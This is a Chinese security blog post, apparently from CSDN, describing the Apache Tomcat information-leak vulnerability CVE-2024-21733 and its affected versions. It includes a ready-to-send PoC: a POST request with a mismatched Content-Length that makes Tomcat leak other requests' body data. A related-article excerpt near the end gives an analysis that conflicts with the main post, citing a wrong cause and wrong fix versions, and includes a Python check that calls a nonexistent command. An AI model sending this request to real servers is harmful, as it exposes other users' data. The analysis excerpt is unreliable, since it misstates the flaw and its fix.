Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)

原创 于 2025-05-14 13:37:17 发布 · 478 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #tomcat #java #web安全 #漏洞复现

该文章已生成可运行项目,

Apache Tomcat 信息泄露漏洞(CVE-2024-21733)情报。Apache Tomcat 是一个开源 Java Servlet 容器和 Web 服务器,用于运行 Java 应用程序和动态网页。Coyote 是 Tomcat 的连接器,处理来自客户端的请求并将它们传递Tomcat 引擎进行处理。攻击者可以通过构造特定请求,在异常页面中输出其他请求的body 数据,修复版本中通过增加 finally 代码块,保证默认会重设缓冲区 position 和 limit 到一致的状态,从而造成信息泄露。

影响版本

从8.5.7到8.5.63
9.0.0-M11到9.0.43

poc

POST / HTTP/1.1
Host: hostname
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded

X
本文章已经生成可运行项目
Nexus存在未授权目录穿越漏洞(CVE-2024-4956)
缘梦未来的博客
12-05 700
Nexus Repository Manager 是一款功能强大的软件仓库管理工具,用于集中存储、管理和分发开发团队的代码工件(如依赖包、容器镜像等),支持多种格式(Maven、npm、Docker 等),提升开发效率和构建流程自动化。
Apache Tomcat 信息泄露漏洞CVE-2024-21733CVE-2024-24549和CVE-2024-34750排查处理
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-14 7859
现场的为中小型项目,未直接使用功能tomcat作为容器使用,仅是jar包里spring-boor框架引入tomcat 内嵌到 web项目中作为web server使用,从而保证项目包可直接运行 webapp项目,无需再部署到额外的tomcat服务了;当不想因为Tomcat就改变SpringBoot的版本时,可以采用排除SpringBoot中的Tomcat包,然后手动指定新的Tomcat的版本来实现升级内置组件的目的,当然还要引入Tomcat相关的包。其中,Coyote作为Tomcat的。
Nacos 修复 Tomcat 信息泄露漏洞CVE-2024-21733
eyeofeagle的博客
08-22 1663
漏洞名称:Apache Tomcat 信息泄露漏洞 漏洞编号:CVE-2024-21733 漏洞等级:高危 影响版本:Apache Tomcat 9.0.0-M11 至 9.0.43, Apache Tomcat 8.5.7 至 8.5.63 安全建议:目前该漏洞已经修复,受影响用户可升级到以下版本: Apache Tomcat >= 9.0.44 Apache Tomcat >= 8.5.64Apache Tomcat版本9.0.0-M11 - 9.0.43、8.5.7 - 8.5.63中均存在信息泄露
如何使用ApacheTomcatScanner扫描Apache Tomcat服务器漏洞
顶峰
02-28 3030
1、支持使用多线程Worker搜索Apache Tomcat服务器;2、支持扫描多个目标:支持接收一个Windows域中的目标计算机列表,支持从文件按行读取目标,支持使用–t/–target选项读取单个目标(IP/DNS/CIDR);3、支持自定义即设置端口列表;4、支持测试/manager/html访问和默认凭证;5、支持使用–list-cves选项查看每个版本的CVE漏洞信息;1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。
SpringBoot漏洞Apache Tomcat信息泄露风险(附解决方案)
Carlos_ForYou的博客
08-15 3425
解决Apache Tomcat信息泄露漏洞
Apache Tomcat信息泄露漏洞
m0_46459413的博客
11-02 4710
9月28日,Apache发布安全公告,公开披露了Tomcat中的一个信息泄露漏洞CVE-2021-43980)。由于某些Tomcat版本中的阻塞式读写的简化实现导致存在并发错误(极难触发),可能使客户端连接共享一个Http11Processor实例,导致响应或部分响应被错误的客户端接收,造成信息泄露Apache Tomcat 版本 >= 10.1.0-M14。Apache Tomcat 版本 >= 10.0.20。Apache Tomcat 版本 >= 8.5.78。
适合新手小白的本地构建Tomcat源码环境并复现CVE-2024-21733漏洞
青青很OK的博客
02-17 1522
之前复现漏洞用到Tomcat环境的时候总是从官网下载安装直接启动,第一次尝试IDEA+Tomcat结合的方式。这里以Tomcat 9.4.43为例,展示Tomcat环境搭建以及复现漏洞CVE-2024-21733​。
Apache Tomcat文件包含漏洞(CVE-2020-1938)【原理扫描】
小小关的博客
01-13 4808
对于该中间件漏洞,系统扫描模块没有爬虫能力,可能导致漏报,建议使用WEB扫描模块进行扫描。 ApacheTomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServerPage(JSP)的支持。 TomcatAJP协议由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行。 受影响版本: ...
Apache Tomcat任意文件上传漏洞CVE-2017-12615
weixin_43736941的博客
07-28 789
漏洞描述 当存在漏洞Tomcat 运行在 Windows 主机上,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执行,导致服务器上的数据泄露或获取服务器权限。 影响范围 Apache Tomcat 7.0.0 – 7.0.79 复现过程 1.环境搭建,在CenOs7靶机 ip 172.16.2.129 上利用doc
Tomcat中间件版本信息泄露
m0_54849806的博客
08-31 3698
解压后,通过vi编辑器修改解压出来的ServerInfo.properties文件(在/org/apache/catalina/util/下)进入Tomcatwebapps/ROOT目录,新增error_404.html页面,使用自定义页面已达到隐藏中间件版本信息的目的。Tomcat服务在响应404/500等网络错误时,默认会将当前版本信息显示出来,这样就造成了中间件版本信息泄露这样的漏洞。进入Tomcat下的lib目录,备份catalina.jar文件后,解压该文件。...
#渗透测试#漏洞挖掘#红蓝攻防#漏洞挖掘#信息泄露漏洞-Apache Tomcat页面泄露漏洞
soc的博客
12-25 1795
免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。
Apache Tomcat信息泄露漏洞(CVE-2016-8745)
weixin_33885253的博客
02-15 2937
10.4.62.91 10.4.62.92 10.4.62.93 10.4.62.94Apache Tomcat信息泄露漏洞(CVE-2016-8745):可通过HTTP获取远端WWW服务信息发布时间:2016-12-12重要程度:重要受影响的版本:Apache Tomcat 9.0.0.m1到9.0.0.m13Apache Tomcat 8.5.0到8.5.8...
Tomcat信息泄露漏洞
lch_pp的博客
09-11 1468
6.删除原来的tomcat8和tomcat,并将新apache-tomcat-8.5.87改为原始的tomcattomcat8,并删除删除新webapps下的examples(示例)# 7.把旧的server.xml;# 1.选择无漏洞的版本,https://tomcat.apache.org/download-80.cgi。# 4.复制旧的tomcattomcat-old下。# 3.备份旧的tomcat。# 5.解压新的tomcat
服务器信息泄漏漏洞,云安全日报210302:Apache Tomcat应用服务器发现信息泄露漏洞,需要尽快升级...
weixin_35794316的博客
08-10 464
Apache HTTP Server(简称Apache)Apache软件基金会的一个开放源码的网页(Web)服务器,可以在大多数计算机操作系统中运行,由于其多平台和安全性被广泛使用,是最流行的Web服务器端软件之一.Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,它是一个小型的轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用。3月...
Apache Tomcat信息泄露漏洞CVE-2024-21733 Springboot 修改Tomcat版本
拉丁解牛技术专栏
02-24 1037
Apache Tomcat版本 9.0.0-M11 - 9.0.43、8.5.7 - 8.5.63中存在 一个信息泄露漏洞CVE-2024-21733),由于coyote/http11/Http11InputBuffer.java中在抛出CloseNowException异常后没有重置缓冲区位置和限制,威胁者可发送不完整的POST请求触发错误响应,从而可能导致获取其他用户先前请求的数据。3、加强系统用户和权限管理,启用多因素认证机制和最小权限原则,用户和软件权限应保持在最低限度。
Apache Tomcat 信息泄露漏洞CVE-2023-28708处理
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
07-10 8056
那么Tomcat就会删除之前的War包解压的文件夹,重新解压新的War包。导致信息泄露,相关分析这是由于在请求https的时候可重定向到http连接,这个过程会导致会话劫持风险,造成Cookie或Session不安全传输,攻击者可利用该漏洞可在未授权的情况下泄漏 Cookie 或 Session,最终造成服务器敏感性信息泄露。改变,包括web-inf/class,wen-inf/lib,web-inf/web.xml等文件,若发生更改,则局部进行加载,不清空session ,不释放内存。
重要信息:关于 Oracle RAC 环境下 Apache Tomcat 漏洞CVE-2024-21733)的解决方案
JiekeXu的博客
08-14 2556
作者 | JiekeXu来源 |公众号 JiekeXu DBA之路(ID: JiekeXu_IT)如需转载请联系授权 |(个人微信 ID:JiekeXu_DBA)大家好,我是 JiekeXu,江湖人称“强哥”,荣获 Oracle ACE Pro 称号,墨天轮 MVP,墨天轮年度“墨力之星”,拥有 Oracle 11g OCP/OCM 认证,MySQL 5.7/8.0 OCP 认证以及 PCA...
Apache Tomcat 信息泄露及远程代码执行漏洞分析与防护
朔方飞絮谈安全
10-26 6608
ApacheTomcat都是WEB网络服务器,一般Apache是静态解析,tomcatjava应用服务器,动态解析jsp、php等,是一个容器(servlet),可以独立于apache运行。打个比方:Apache是一辆车,上面可以装东西,比如html等;但不能装水,要装水必须要有容器(桶),而这个桶也可以不放在车上,这个就是Tomcat
Tomcat版本号泄露漏洞修复
weixin_43959970的博客
06-27 1819
#当调用不存在的页面或服务时,Tomcat会返回版本号或Spring异常信息。##解决:在conf/server.xml文件的Host结节下添加如下内容。## 另一种解决方案是在每个一网站的web.xml里配置错误重定向页面。
Tomcat 信息泄露漏洞(CVE-2024-21733)漏洞原理
最新发布
06-14
### Tomcat CVE-2024-21733 信息泄露漏洞原理分析 Tomcat CVE-2024-21733 是一个与 Apache Tomcat 相关的信息泄露漏洞,主要影响较低版本的 Tomcat 实现。该漏洞允许攻击者通过特定请求构造,获取到本应受保护的敏感信息。以下是漏洞的具体原理分析: #### 1. 漏洞背景 Apache Tomcat 是一个广泛使用的开源 Java Servlet 容器和 Web 服务器。在处理 HTTP 请求时,Tomcat 需要对请求头和响应头进行解析与验证。然而,在某些版本中,Tomcat 的实现存在缺陷,未能正确限制或过滤用户输入的内容,从而导致了信息泄露问题[^2]。 #### 2. 漏洞成因 该漏洞的根本原因是 Tomcat 在处理部分 HTTP 请求头时,未对输入数据进行充分校验。具体表现为: -Tomcat 收到包含恶意构造字段的 HTTP 请求时,可能返回额外的调试信息或系统配置数据。 - 这些信息可能包括但不限于:服务器路径、文件结构、环境变量等敏感内容。 #### 3. 漏洞触发条件 根据已知信息,以下条件可能触发漏洞- 使用受影响的 Tomcat 版本(如低于 8.5.69 的版本)。 - 攻击者发送特定格式的 HTTP 请求,例如包含异常字段或超出预期长度的请求头。 - Tomcat 在处理这些请求时,未正确过滤非法输入,导致敏感信息被暴露。 #### 4. 漏洞影响范围 根据 GIRU 与 Tomcat 版本的对应关系,受影响的 Tomcat 版本主要包括: - Tomcat 8.5.x 系列:低于 8.5.69 的版本。 - Tomcat 9.x 系列:虽然目前未明确提及,但建议检查是否存在类似问题。 Oracle 的官方修复记录显示,从 GIRU 版本 19.13 开始,已经包含了修复该漏洞Tomcat 8.5.69 版本。 #### 5. 漏洞利用过程 攻击者可以通过以下方式利用该漏洞- 构造特殊的 HTTP 请求头,尝试触发 Tomcat 的错误响应机制。 - 捕获并分析返回的响应数据,提取其中的敏感信息。 - 利用这些信息进一步实施其他攻击,例如提权或横向渗透。 #### 6. 防护措施 为避免该漏洞带来的风险,建议采取以下防护措施: - 升级 Tomcat 至最新稳定版本(如 8.5.69 或更高版本)。 - 对于使用 Oracle 数据库的用户,确保 Grid Infrastructure Release Update (GIRU) 版本不低于 19.13。 - 配置防火墙或 WAF(Web Application Firewall),以过滤异常的 HTTP 请求。 - 定期审查日志文件,检测是否存在可疑访问行为。 ```python # 示例代码:检查当前 Tomcat 版本 import subprocess def check_tomcat_version(): try: result = subprocess.run(['tomcat', 'version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True) if "8.5.69" in result.stdout or "9.0.87" in result.stdout: print("Tomcat 版本安全") else: print("请升级 Tomcat安全版本") except Exception as e: print(f"发生错误: {e}") check_tomcat_version() ``` ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值